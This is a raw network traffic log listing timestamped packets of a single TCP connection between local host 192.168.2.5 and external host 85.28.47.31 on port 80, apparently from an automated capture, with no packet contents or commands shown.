Jul 26, 2024 17:56:14.446872950 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.446883917 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.446894884 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.446906090 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.446913004 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.446917057 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.446928978 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.446938992 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.446944952 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.446950912 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.446963072 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.446970940 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.446974039 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.446997881 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.447000027 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.447010994 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.447020054 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.447021961 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.447032928 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.447043896 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.447050095 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.447055101 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.447077990 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.447096109 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.447137117 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.447148085 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.447158098 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.447169065 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.447175980 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.447180033 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.447191954 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.447201967 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.447202921 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.447212934 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.447221994 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.447222948 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.447233915 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.447244883 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.447247028 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.447269917 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.447285891 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.447426081 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.447463989 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.447527885 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.447540045 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.447550058 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.447561026 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.447565079 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.447571993 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.447582960 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.447588921 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.447623014 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.447786093 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.447798014 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.447808027 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.447818041 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.447829008 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.447834015 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.447840929 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.447851896 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.447855949 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.447864056 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.447881937 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.447911978 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.447925091 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.447936058 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.447959900 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.447987080 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.447990894 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.448000908 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.448013067 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.448024035 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.448026896 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.448035002 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.448045015 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.448045969 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.448079109 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.448487997 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.448527098 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.448580027 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.448596954 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.448621035 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.448632002 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.448653936 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.448671103 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.448678017 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.448688984 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.448699951 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.448710918 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.448712111 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.448736906 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.448760986 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.448863983 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.448874950 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.448888063 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.448899031 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.448900938 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.448910952 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.448921919 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.448921919 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.448932886 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.448944092 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.448951960 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.448970079 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.448995113 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.449104071 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.449115038 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.449127913 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.449145079 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.449156046 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.449167013 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.449177027 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.449178934 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.449187040 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.449194908 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.449198961 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.449209929 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.449215889 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.449220896 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.449233055 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.449249029 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.449251890 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.449259996 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.449265003 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.449295998 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.449456930 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.449467897 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.449496984 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.449604988 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.449615955 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.449625969 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.449636936 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.449644089 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.449649096 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.449660063 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.449662924 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.449671030 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.449681997 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.449692011 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.449697018 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.449702978 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.449713945 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.449724913 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.449748039 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.449851036 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.449862957 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.449886084 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.449913979 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.539391994 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.539426088 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.539438009 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.539518118 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.539529085 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.539546013 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.539558887 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.539570093 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.539607048 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.539628029 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.539659977 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.539674044 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.539700031 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.539704084 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.539717913 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.539730072 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.539731026 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.539742947 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.539753914 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.539753914 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.539764881 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.539777040 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.539792061 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.539808989 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.539834976 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.539963007 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.539975882 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.539988041 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.539998055 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.540003061 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.540023088 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.540052891 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.540072918 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.540085077 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.540096045 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.540107012 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.540113926 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.540118933 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.540144920 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.540162086 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.540330887 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.540344000 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.540355921 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.540365934 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.540371895 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.540378094 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.540395975 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.540406942 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.540419102 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.540424109 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.540431976 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.540443897 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.540445089 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.540455103 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.540467024 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.540473938 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.540477037 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.540494919 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.540504932 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.540505886 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.540518045 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.540524960 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.540530920 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.540541887 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.540551901 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.540555954 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.540564060 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.540575981 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.540585995 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.540604115 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.540640116 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.540929079 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.540950060 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.540961981 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.540971994 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.540976048 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.540983915 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.540994883 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.540994883 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.541007996 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.541018009 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.541027069 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.541028023 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.541045904 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.541050911 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.541069984 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.541079998 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.541083097 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.541094065 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.541100025 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.541105032 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.541117907 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.541122913 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.541129112 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.541140079 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.541151047 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.541151047 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.541176081 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.541186094 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.541194916 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.541197062 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.541208029 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.541219950 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.541228056 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.541233063 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.541244030 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.541254997 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.541261911 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.541265011 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.541276932 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.541281939 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.541289091 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.541300058 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.541300058 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.541311979 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.541318893 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.541358948 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.541961908 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.541975021 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.541989088 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.542001963 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.542011023 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.542011976 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.542026043 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.542038918 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.542046070 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.542049885 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.542062044 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.542073011 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.542078018 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.542094946 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.542105913 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.542114973 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.542117119 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.542128086 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.542139053 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.542145967 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.542150021 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.542160988 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.542166948 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.542171955 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.542185068 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.542196035 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.542206049 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.542207956 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.542217970 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.542226076 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.542229891 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.542241096 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.542252064 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.542258978 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.542264938 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.542275906 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.542284012 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.542288065 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.542299032 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.542304993 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.542310953 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.542323112 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.542325974 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.542349100 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.542362928 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.542877913 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.542921066 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.542952061 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.542962074 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.543023109 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.614507914 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.614546061 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.614557981 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.614669085 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.614681005 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.614691019 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.614691019 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.614701986 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.614764929 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.627974033 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.627993107 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.628004074 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.628015041 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.628087997 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.628195047 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:14.628223896 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.628237009 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:14.628248930 CEST	80	49704	85.28.47.31	192.168.2.5
